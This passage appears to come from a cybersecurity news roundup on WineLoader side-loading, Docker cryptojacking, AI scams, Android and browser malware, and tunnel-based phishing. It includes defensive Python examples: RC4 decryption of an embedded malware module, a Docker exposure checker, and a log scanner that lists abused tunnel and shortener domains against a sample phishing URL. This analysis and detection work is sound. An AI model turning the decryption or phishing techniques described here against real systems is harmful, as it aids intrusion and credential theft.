Eventually, the file runs sqlwriter.exe from the directory C:\Windows\Tasks\, which loads a malicious DLL named vcruntime140.dll placed alongside it. This is DLL side-loading: sqlwriter.exe is a legitimate SQL Server binary that expects a library of that name, and it finds the attacker's copy first. The DLL's exported function set_se_translator then decrypts the WineLoader core module embedded in the DLL using a hardcoded 256-byte RC4 key and runs it.
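Once the hardcoded key has been recovered from the DLL, extracting the embedded module is a matter of running RC4 over the right blob and checking that a PE image comes out. The following is an added example, not Zscaler's code: an RC4 implementation (key-scheduling and keystream generation) with a PE-header sanity check, exercised against a constructed 256-byte key and a minimal PE-shaped stand-in for the core module. The real key and blob live in the malware, not on this page.

```python
# Added example, not Zscaler's code: the RC4 step an analyst reproduces to pull
# the embedded module out of the side-loaded DLL once the hardcoded key has been
# recovered. Key and "module" below are constructed; the real key and blob are
# in the malware, not on this page.
import struct
from typing import Iterator


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Key-scheduling (KSA) followed by the pseudo-random generation loop (PRGA)."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 keys are 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):            # KSA: with a 256-byte key every key byte is used exactly once
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                     # PRGA: one keystream byte per iteration
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on decrypted output: DOS 'MZ' header and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_module(encrypted_blob: bytes, key: bytes) -> bytes:
    """Decrypt the embedded module and refuse output that is not a PE image."""
    plain = rc4(key, encrypted_blob)
    if not looks_like_pe(plain):
        raise ValueError("decryption did not yield a PE image: wrong key or wrong offset")
    return plain


# Constructed 256-byte key (the real one is hardcoded in the DLL) and a minimal
# PE-shaped stand-in for the core module: MZ header, e_lfanew = 0x40, PE signature.
KEY = bytes((i * 7 + 3) & 0xFF for i in range(256))
MODULE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 60
ENCRYPTED = rc4(KEY, MODULE)

if __name__ == "__main__":
    recovered = recover_module(ENCRYPTED, KEY)
    print(recovered[:2], looks_like_pe(recovered), recovered == MODULE)
```

The PE check is what separates a successful extraction from a near miss: with the wrong key, or the right key applied at the wrong offset into the DLL, RC4 still returns bytes, just not meaningful ones. The module name the blog mentions (Win64.Downloader.WineLoader) is the detection label for what comes out of this step.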

Protection and detection 

Zscaler ThreatLabz warned contacts at India's National Informatics Centre (NIC) about the attack's usage of Indian official themes. 

The C2 server only responds to specific types of request at specific times, so automated analysis systems cannot obtain C2 responses and modular payloads for detection and analysis, the researchers said. To help defenders, they published a list of indicators of compromise (IoCs) and URLs related to the attack in their blog post.

Zscaler says its multilayered cloud security platform detects IoCs linked to WineLoader at multiple levels, including files carrying the threat name Win64.Downloader.WineLoader, the researchers concluded.

Novel Cryptojacking Campaign is Targeting Docker APIs Across the Internet

 

Cado Security researchers recently identified a sophisticated cryptojacking campaign that exploits Docker API endpoints exposed to the internet.

The campaign, dubbed "Commando Cat", has been active since early 2024, and the researchers note that it is the second such campaign identified in only two months. The first container, created with the open-source Commando tool, looks innocuous, but it lets the attackers break out to the Docker host and launch several payloads there. That is the real lesson of an exposed Docker API: anyone who can create a container can also mount the host filesystem into it, so the API is effectively root on the host.

The payloads delivered depend on the campaign's immediate goals, which include establishing persistence, backdooring the host, exfiltrating cloud service provider credentials and deploying cryptocurrency miners, according to the researchers. The miner is the well-known XMRig, a popular cryptojacking tool that mines Monero (XMR), a privacy-oriented currency that is very difficult to trace.

Cado Security's researchers add that Commando Cat temporarily stores stolen files in a separate folder, apparently as an evasion tactic; it certainly complicates forensic analysis.

At the time of writing, the researchers did not know who is behind Commando Cat, although they noted similarities in shell scripts and C2 IP addresses with another cryptojacking group, TeamTNT. Cado does not believe TeamTNT is behind this campaign, however, and suspects a copycat group.

The researchers advise users to update their Docker installations and put appropriate security measures in place. In practice that means never exposing the Docker API over TCP without TLS client authentication, and preferably keeping it on the local Unix socket or a restricted management network.
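The exposure Commando Cat abuses is a configuration choice, so it can be checked before an attacker finds it. The following is an added example, not code from Cado Security: it reads a Docker daemon.json and reports any tcp:// listener that lacks TLS client verification or is bound to every interface, with the weak configuration beside the corrected one. Both configurations and the certificate paths are constructed for illustration; the keys (hosts, tlsverify, tlscacert, tlscert, tlskey) are the real daemon options.

```python
# Added example, not from Cado's report: check a Docker daemon.json for the
# exposure Commando Cat abuses. The Docker API has no authentication of its
# own, and anyone who can create a container can mount the host filesystem,
# so a TCP listener without TLS client verification is root for whoever can
# reach it. Both configurations below are constructed.
import json
from typing import List
from urllib.parse import urlparse

DEFAULT_HOSTS = ["unix:///var/run/docker.sock"]
TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")


def exposure_findings(daemon_json: str) -> List[str]:
    """Return one finding per problem; an empty list means no TCP exposure found."""
    cfg = json.loads(daemon_json)
    findings: List[str] = []
    for host in cfg.get("hosts", DEFAULT_HOSTS):
        u = urlparse(host)
        if u.scheme != "tcp":
            continue                      # unix:// and fd:// listeners are local-only
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: API over TCP without tlsverify (no client authentication)")
        elif not all(cfg.get(k) for k in TLS_MATERIAL):
            findings.append(f"{host}: tlsverify set but tlscacert/tlscert/tlskey incomplete")
        if (u.hostname or "") in ("", "0.0.0.0", "::"):
            findings.append(f"{host}: bound to every interface; restrict to a management address")
    return findings


def is_hardened(daemon_json: str) -> bool:
    return not exposure_findings(daemon_json)


# The weak setting: the classic internet-exposed port 2375, plaintext, no client certs.
WEAK = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# The corrected setting: management address only, TLS with mutual authentication.
HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, exposure_findings(cfg))
```

Two practical caveats: the check only sees daemon.json, so a -H flag in the systemd unit file must be reviewed as well (on distributions that set one, specifying hosts in both places prevents the daemon from starting), and a firewall rule limiting who can reach the TLS port is still worth having even when client certificates are required.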

Last month the same team uncovered a similar campaign that used insecure Docker hosts to install both XMRig and the 9Hits Viewer software. 9Hits is an online traffic exchange platform whose members drive traffic to each other's websites.

When a user installs 9hits, their device visits the websites of other members using a headless Chrome instance. In exchange, the user earns credits, which may subsequently be used to attract traffic to their own websites. Installing 9hits on compromised Docker instances generates more credits, which the attackers can then use to buy more traffic.

Watch Out For These ChatGPT and AI Scams

 

Since ChatGPT's launch in November of last year, it has consistently proved useful, with people around the world finding new uses for it every day. The power of AI tools, however, means they can also be put to malicious use, such as writing malware and phishing emails.

Over the past six to eight months, hackers have been observed exploiting the trend to defraud people of their money and information with fake investment opportunities and scam apps. They have also been seen using AI itself to plan scams.

AI scams are among the hardest to spot, and many people don't use tools like Surfshark antivirus, which warns users before they visit dubious websites or download dubious apps. So we have compiled a list of the common tactics recently seen in the wild.

Phishing scams with AI assistance 

Phishing scams have been around for a long time. Scammers send emails or texts pretending to come from a trusted organisation, such as Microsoft, to trick you into clicking a link that leads to a malicious website.

A threat actor can then use that site to spread malware or steal sensitive data such as passwords from your device. Historically, one of the simplest ways to identify such messages has been spelling and grammar mistakes, which a prominent corporation like Microsoft would never make in a business email to its clients. 

In 2023, however, ChatGPT can produce clear, fluent copy that is free of typos from just a brief prompt. This makes it far harder to tell genuine messages from phishing attempts. 

Voice clone AI scams

In recent months, scams that use artificial intelligence (AI) have gained attention. In a recent global McAfee study, 10% of respondents said they had already been personally targeted by an AI voice scam, and a further 15% said they knew a victim. 

AI voice scams start by stealing audio clips from a target's social network account, then use text-to-speech software to generate new speech that mimics the original voice. Such programmes have legitimate, non-nefarious uses and are freely available online. 

The con artist records a voicemail or voice message in which they portray the target as distressed and desperately in need of money. This is then sent to the target's family members in the hope that they cannot tell their loved one's voice from an AI-generated one. 

Scams with AI investments

Scammers are using the hype surrounding AI, as well as the technology itself, in a manner similar to how they did with cryptocurrencies, to create phoney investment possibilities that look real.

Both "TeslaCoin" and "TruthGPT Coin" have been utilised in fraud schemes, capitalising on the attention that Elon Musk and ChatGPT have received in the media and positioning themselves as hip investment prospects. 

According to California's Department of Financial Protection & Innovation (DFPI), Maxpread Technologies fabricated an AI-generated CEO and programmed it with a script enticing potential investors to invest. The company has been issued a cease-and-desist order. 

The DFPI says that Harvest Keeper, another investment firm, collapsed back in March. According to Forbes, Harvest Keeper employed an actor to pose as its CEO in an effort to calm irate clients. This demonstrates the lengths to which some con artists will go to make their sales pitch plausible.

Way forward

Consumers in the US lost a staggering $8.8 billion to scammers in 2022, and 2023 is not expected to be any different. Periods of financial instability frequently coincide with rises in fraud, and many nations worldwide are experiencing difficulties. 

Artificial intelligence is currently a goldmine for con artists. Although everyone is talking about it, relatively few people are actually knowledgeable about it, and businesses of all sizes are rushing AI products to market. 

Keeping up with the latest scams is crucial, and even more so now that AI has made them much harder to detect. The FTC, FBI and other federal agencies issue warnings regularly, so following them on social media for the latest information is strongly encouraged. 

Security professionals advise buying a VPN that detects spyware, such as NordVPN or Surfshark. Both warn you about dubious websites hidden in Google Search results pages and, like a conventional VPN, hide your IP address. Arming yourself with technology like this is crucial if you want to stay safe online.

Bangladeshi Hacker Group Targets Multiple Indian News Agencies


An update regarding the cyberattack on Alt News has brought up cybersecurity news in Indian media once more. After focusing on Indian news agency ANI News for a few hours, the threat actor group "Mysterious Team Bangladesh" has now listed the well-known Indian fact-checking website "Alt News" as its latest victim. 

The hacktivist group claims that the purported ANI News and Alt News cyberattacks are a part of their ongoing OpIndia23 campaign against the Indian media for allegedly inciting hatred and false information. 

ANI News is a news organisation with its main office in New Delhi. Mohammed Zubair and Pratik Sinha, two former IT engineers, launched the fact-checking website Alt News, a non-profit organisation in India. 

Both organisations' websites were reachable at the time of writing. The claimed Alt News hack was one of a number of cyberattacks on international targets. 

Mysterious Team shared the hashtags "opindia23," "counterattack," and "OpTerrorismCountry" along with the Telegram message. The group has accounts on several social media networks and has 1,283 Telegram subscribers. 

The bio for the gang on its Twitter account, where they frequently discuss the specifics of their attacks and victims, reads, "We are cyber warriors of Bangladesh." 

Along with articles on hacking and cyberattacks, the group also publishes the names of other hackers. A name that came up was "_barbby," who according to his biography is a journalist and a human rights advocate. There were two hashtags on the profile: OpIsrael and FreePalestine.

In the bio of another hacker, YourAnonRiots, it was said, "Our mission is global peace." The profile's hashtag was HackThePlanet, which appears to be the case in light of the hacking attacks on numerous government and other organisation websites. Your Anon Story, MCA Ops, and Saudi Exile were the other hackers that had been identified.

In the past 24 hours, the Mysterious Team Bangladesh group has also listed TV7 Israel News, Uniurdu, an Urdu-language news website, and Univarta, a Hindi-language news website, as victims. Furthermore, the hacktivist group also targeted the website of The Press Trust of India.

Along with saying "Expect Us," the organisation also declared that it had attacked the Indian Computer Emergency Response Team. 

The Mysterious Team appears to be a sizable group made up of numerous hackers that use system weaknesses to get access. But nothing is known about their method of attack other than the fact that they effectively shut down the systems and publish screenshots of their hacks on their various social media platforms.

How AI is Helping Threat Actors to Launch Cyber Attacks


Artificial intelligence offers great promise, and while many tech enthusiasts are enthusiastic about it, hackers are also looking to this technology to aid their illicit activities. The field of artificial intelligence is interesting, but it may also make us nervous. Therefore, how might AI support online criminals? 

Social engineering 

Every week, social engineering, a form of cybercrime, claims countless victims and is a big issue worldwide. In this technique, the victim is coerced into complying with the attacker's demands through manipulation, frequently without being aware that they are the target. 

By creating the text that appears in fraudulent communications like phishing emails and SMS, AI could aid in social engineering attempts. It wouldn't be impossible, even with today's level of AI development, to instruct a chatbot to create a compelling or persuasive script, which the cybercriminal could then employ against their victims. People have taken notice of this threat and are already worried about the dangers that lie ahead.

AI could also help make hostile communications appear more formal and professional by correcting typos and grammatical errors, which are frequently cited as potential indicators of malicious activity. Being able to write social engineering content more clearly and effectively is therefore an advantage for cybercriminals. 

Analysing stolen data

Data is worth as much as gold. Sensitive information is currently regularly sold on dark web markets, and some dangerous actors are willing to pay a very high price for the information if it is sufficiently valuable. 

But data must first be stolen before it can appear on these marketplaces. Small-scale data theft is certainly possible, particularly when an attacker targets single victims, but larger hacks may lead to the theft of sizable databases. The cybercriminal must then decide which information in this database is worthwhile. 

If identifying valuable information were expedited with AI, a malicious actor would spend less time deciding what is worth selling or, alternatively, exploiting directly by hand. Since learning is the foundation of artificial intelligence, it may someday be simple to use an AI-powered tool to detect valuable sensitive information. 

Malware writing 

Some people would not be surprised to learn that malware can be created using artificial intelligence because this is a sophisticated form of technology. A combination of the words "malicious" and "software," malware refers to the various types of malicious software used in hacking. 

Malware must first be written, though, before it can be used. Not all cybercriminals are skilled programmers, and others simply do not want to spend the time learning how to write new programmes. This is where AI may prove useful. 

In early 2023 it was discovered that ChatGPT could be used to create malware for nefarious purposes. OpenAI's wildly popular ChatGPT is backed by an AI infrastructure, and although the chatbot is being used by hackers, it can also perform many legitimate tasks. 

In one particular instance, a user claimed in a hacker forum that ChatGPT had been used to write a Python-based malware programme. Writing malicious software could be efficiently automated with ChatGPT, which makes it easier for novice cybercriminals with limited technical knowledge to operate. 

ChatGPT (or at least its most recent version) can only produce simple, occasionally buggy malware rather than sophisticated code that poses serious hazards. That does not rule out the use of AI to create malicious software, however. Given that a modern AI chatbot can already write simple malicious programmes, it may not be long before more harmful malware starts to emerge from AI systems. 

Bottom line 

Artificial intelligence has been and will continue to be abused by cybercriminals, as is the case with the majority of technological advancements. It's absolutely impossible to predict how hackers will be able to progress their attacks utilising this technology in the near future given that AI already has certain dubious skills. Cybersecurity companies may also use AI more frequently to combat similar threats, but only time will tell how this one develops.

Digitally Crafted Swatting Service Is Wreaking Havoc Across United States


A Telegram user who claimed to have left bombs in places like high schools by using a digitally synthesised voice has been linked to a series of swatting calls that have occurred over several months across the United States. 

According to Vice, the user going by the alias "Torswats" on the messaging app Telegram provides a paid swatting-call service. Swatting is the act of lying to law enforcement about a bomb threat, or falsely accusing someone at a specific location of committing a crime or storing illegal materials. 

Customers may purchase "extreme swattings" for $50, which typically involve police handcuffing a suspect and searching their home, and for $75 Torswats can reportedly lock down a school. According to Vice, Torswats accepts bitcoin as payment, gives loyal clients a discount, and will haggle over prices for well-known targets.

“Hello, I just committed a crime and I want to confess. I placed explosives in a local school,” says the voice on a recording of a Torswats call with law enforcement. 

Torswats' voice is digitally generated by artificial intelligence, though it is not immediately clear whether it is the same technology that has made some voice performers obsolete by simulating human speech so expertly. Of the 35 recordings Vice found, two did not use a digital voice. According to a recording of a phone call obtained by Vice, Torswats threatened to detonate a bomb at Hempstead High School in Dubuque, Iowa; local media reported on the threat. 

Torswats allegedly also targeted a CBD store in Florida, a business in Maryland, and homes in Virginia, Massachusetts, Texas, and California. 

Steve Bernd, FBI Seattle's public affairs officer, said, "The FBI takes swatting extremely seriously because it puts innocent people at harm." Police have been discussing the "swatting" problem for at least a decade, and other incidents have made headlines more recently.

Just last month, a Seattle man was indicted for extortion and threats after making more than 20 swatting calls to the police. He is said to have broadcast these calls live to a Discord group.

Harly Trojan Affects Users by Impersonating Legitimate Applications


Numerous malicious apps hide in the Google Play Store, appearing harmless while actually carrying malware. The Google Play Store is an official platform whose moderators carefully monitor every submission, but some apps evade their checks because it is not possible to review every app before it goes live on the platform. 

One such widespread malware, the Trojan subscriber Harly, has been discovered by Kaspersky. It affects users by signing them up for paid services without their knowledge. The malware shows similarities with the Jocker Trojan subscriber, so experts presume the two have a common origin. 

A trojan is malicious code or software that gets downloaded onto a system disguised as a legitimate application. 

In the past three years, over 190 apps on the Google Play Store have been found infected with the Harly Trojan, with more than 4.8 million downloads between them.  

To spread the malware to more devices, the threat actors download the original applications, insert their malicious code into them, and re-upload them to the Google Play Store under a different name. 

The attackers play it smart by keeping the same features in the app as listed in the description, so that users do not suspect a threat. Impersonating legitimate apps also serves as advertising for the malicious copies. 

Trojans in the Harly family carry a payload inside the application and use numerous methods to decrypt and execute it. 

After decryption, Harly gathers information about the user's device, including the mobile network. Over the mobile connection, the malware opens a list of subscription addresses retrieved from a C&C server, automatically enters the user's mobile number and completes the remaining steps, including supplying the OTP taken from SMS messages. As a result, the user ends up with a paid subscription to a service without their knowledge or consent.  

To avoid falling victim to such apps, anti-virus experts suggest reading reviews of applications before downloading them. Google has been notified about these apps and asked to remove all Trojan-infected apps from the platform and from infected devices. 

ChromeLoader: Microsoft, VMware Warns of the New Malware Campaigns


Microsoft and VMware are warning about an ongoing, widespread ChromeLoader malware campaign that has led to “ongoing wide-ranging click fraud” this year. 

The malware tool named ChromeLoader hijacks browsers to redirect users to ad pages. It has since evolved into a more serious threat, deploying more potent payloads that go beyond malvertising: variants of ChromeLoader have been dropping malicious browser extensions, node-WebKit malware, and even ransomware on Windows PCs and Macs. 

Functioning of ChromeLoader 

Microsoft detected an ongoing widespread click-fraud campaign and attributed it to the threat actor DEV-0796. The attack begins with an ISO file that is downloaded when the user clicks a malicious ad, browser redirect, or YouTube comment. The attackers seek to profit from clicks generated by malicious browser extensions or node-WebKit that they have installed on the victim’s device, without being detected.  

Researchers from VMware’s Carbon Black Managed Detection and Response (MDR) team said they have seen the malware’s operators impersonating various legitimate services that lead users to ChromeLoader. The researchers observed hundreds of attacks involving variants of the malware, targeting multiple sectors such as education, government, healthcare, and enterprises in business services. 

“This campaign has gone through many changes over the past few months, and we don’t expect it to stop [...] It is imperative that these industries take note of the prevalence of this threat and prepare to respond to it,” warn the researchers. 

Rapid Evolution Of Malware

Earlier, the malware infected Chrome with a malicious extension that redirected the user traffic to advertising sites performing click frauds and generating income for the threat actors. “But, it later evolved into an ‘info-stealer’, stealing sensitive data stored in browsers and deploying zip bombs (i.e. malicious archive files) to crash systems, while still retaining its adware function,” said researchers, in an advisory released on September 19. 

Because adware does not cause any significant damage to a victim’s software, analysts often do not take the threat seriously. However, any software that can enter a system undetected, as ChromeLoader does, is an immediate threat to the user, since its operators can then push modifications that open up further monetisation options for the malware. 

“The Carbon Black MDR team believes that this is an emerging threat that needs to be tracked and taken seriously [...] due to its potential for delivering more nefarious malware,” VMware said in the advisory. 

Reverse Tunnels and URL Shorteners Employed by Attackers to Launch Phishing Campaign


Security researchers at CloudSEK, a digital risk protection firm, have observed a significant surge in the use of reverse tunnel services and URL shorteners in wide-scale phishing campaigns. 

This methodology differs from the more typical modus operandi of registering domains with hosting providers, who are more likely to react to complaints and shut down the malicious sites. 

Reverse tunnel services let threat actors host phishing pages locally on their own devices and route connections through the external service. Additionally, they can generate new URLs through URL shortening services as often as required to evade detection. Many of the phishing URLs are updated in less than 24 hours, making it harder for researchers to spot and take down malicious domains. 

As reported by BleepingComputer, researchers have identified more than 500 sites hosted and distributed using a combination of reverse tunneling and URL shortening. Ngrok, LocalhostRun, and Argo were the most commonly abused reverse tunnel services, while Bit.ly, is.gd, and cutt.ly were the most prevalent URL shorteners. 

According to CloudSEK, cybercriminals can hide their identity by using URL shorteners to mask the real URL, since a shortened link is typically a series of random characters. The malicious links are distributed via Telegram, WhatsApp, phony social media pages, texts, and emails. 

It is worth noting that the cybersecurity landscape is not unfamiliar with the abuse of reverse tunneling. For example, the digital banking platform of the State Bank of India had previously been impersonated in such phishing campaigns to exfiltrate users’ credentials. 

The malicious link was concealed behind “cutt[.]ly/UdbpGhs” and directed to the domain “ultimate-boy-bacterial-generates[.]trycloudflare[.]com/sbi” that employed Cloudflare’s Argo tunneling service. Subsequently, the malicious page requested bank account credentials, PAN card numbers, Aadhaar unique identification numbers, and mobile phone numbers. However, CloudSEK did not share how damaging this campaign was for bank users. 

Private details collected this way can be sold on the dark web or used by hackers to drain bank accounts. If the data is from a firm, the attackers could use it to launch ransomware attacks or business email compromise (BEC) scams. To mitigate the risks, users should avoid clicking on links received from an unfamiliar source.
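A defender's view of the pattern described above, as an added example that is not CloudSEK's or BleepingComputer's code: a small scanner that runs over proxy log lines, flags URLs whose host belongs to a reverse-tunnel service or a URL shortener, and singles out clients that hit a shortener and then a tunnel host, the redirect chain the article describes. The service domains and the log lines are assumptions constructed for the example; extend the lists to match your environment.

```python
"""Flag reverse-tunnel hosts and URL shorteners in proxy logs (added example)."""
import re
from urllib.parse import urlsplit

# Reverse-tunnel services named in the article; the domains are assumptions.
TUNNEL_DOMAINS = ("trycloudflare.com", "ngrok.io", "ngrok-free.app", "localhost.run")
# URL shorteners named in the article.
SHORTENER_DOMAINS = ("bit.ly", "is.gd", "cutt.ly")


def refang(url: str) -> str:
    """Turn a defanged indicator such as cutt[.]ly or hxxps:// back into a real URL."""
    return re.sub(r"^hxxp", "http", url.replace("[.]", "."), flags=re.I)


def host_of(url: str) -> str:
    """Return the lowercase hostname of a URL, tolerating a missing scheme and a port."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def matches(host: str, domains) -> bool:
    """Suffix match on a label boundary, so 'notngrok.io' does not match 'ngrok.io'."""
    return any(host == d or host.endswith("." + d) for d in domains)


def classify(url: str) -> str:
    """Return 'tunnel', 'shortener' or 'ok' for one (possibly defanged) URL."""
    host = host_of(refang(url))
    if matches(host, TUNNEL_DOMAINS):
        return "tunnel"
    if matches(host, SHORTENER_DOMAINS):
        return "shortener"
    return "ok"


# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
2022-06-06T10:01:02Z 10.0.0.12 GET https://cutt.ly/UdbpGhs 302
2022-06-06T10:01:03Z 10.0.0.12 GET https://ultimate-boy-bacterial-generates.trycloudflare.com/sbi 200
2022-06-06T10:02:10Z 10.0.0.33 GET https://bank.example/login 200
2022-06-06T10:03:44Z 10.0.0.41 POST http://abcd-1234.ngrok.io:443/verify 200
2022-06-06T10:04:00Z 10.0.0.41 GET https://notngrok.io/index.html 200
"""


def scan_log(text: str):
    """Return (client_ip, url, verdict) for every flagged line, in log order."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than abort the whole scan
        client, url = parts[1], parts[3]
        verdict = classify(url)
        if verdict != "ok":
            hits.append((client, url, verdict))
    return hits


def redirect_chain_suspects(text: str):
    """Clients that hit a shortener and later a tunnel host: stronger evidence
    of the shortener -> tunnel redirect chain than either indicator alone."""
    after_shortener, suspects = set(), []
    for client, _, verdict in scan_log(text):
        if verdict == "shortener":
            after_shortener.add(client)
        elif client in after_shortener and client not in suspects:
            suspects.append(client)
    return suspects


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("redirect-chain suspects:", redirect_chain_suspects(SAMPLE_LOG))
```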

Researchers Warn of Fake Windows 11 Upgrade Containing Info Stealing Malware


Cybercriminals are tricking users into installing a fake Windows 11 upgrade that includes malware that steals data from web browsers and crypto-wallets. The malicious campaign that is still running operates by poisoning search results to drive traffic to a website impersonating Microsoft’s Windows 11 advertising page and offering the information stealer. 

According to CloudSEK threat researchers who analyzed the malware and published a technical report, malicious actors are focusing on people who rush to install Windows 11 without first learning that the OS must satisfy specific requirements. 

The rogue website advertising the false Windows 11 has official Microsoft logos, favicons, and a “Download Now” button. It looks legitimate at first glance, but the URL reveals the site as fraudulent. If visitors access the malicious website directly (download is not possible via TOR or VPN), they will receive an ISO file containing the executable for new information-stealing malware. 

The CloudSEK researchers named the new malware 'Inno Stealer' as it uses the Inno Setup Windows Installer. The researchers said that Inno Stealer has no code in common with other presently circulating info-stealers. Once active, the malware plants a pair of files that disable various Windows security measures, including those in the registry. They also wipe out software from anti-virus companies Emsisoft and ESET. 

Inno Stealer’s capabilities are typical for this kind of malware, including the ability to collect web browser cookies and passwords, data from cryptocurrency wallets, and data from the disk. The set of targeted browsers and crypto wallets is extensive, including Chrome, Edge, Brave, Opera, Vivaldi, 360 Browser, and Comodo. 

The malware can also fetch extra payloads, an action performed only at night, potentially to take advantage of the victim’s absence from the computer. These additional Delphi payloads, which are TXT files, use the same Inno-based loader that tampers with the host’s security tools and employ an identical persistence method. They can also grab clipboard data and exfiltrate directory enumeration data. 

To mitigate the risks, researchers recommended avoiding downloading ISO files from obscure sources and instead undertaking significant OS updates using the Windows 10 control panel or obtaining the installation files directly from the source. If you can’t upgrade to Windows 11, there’s no point in attempting to bypass the limitations manually since this will come with a slew of drawbacks and severe security risks.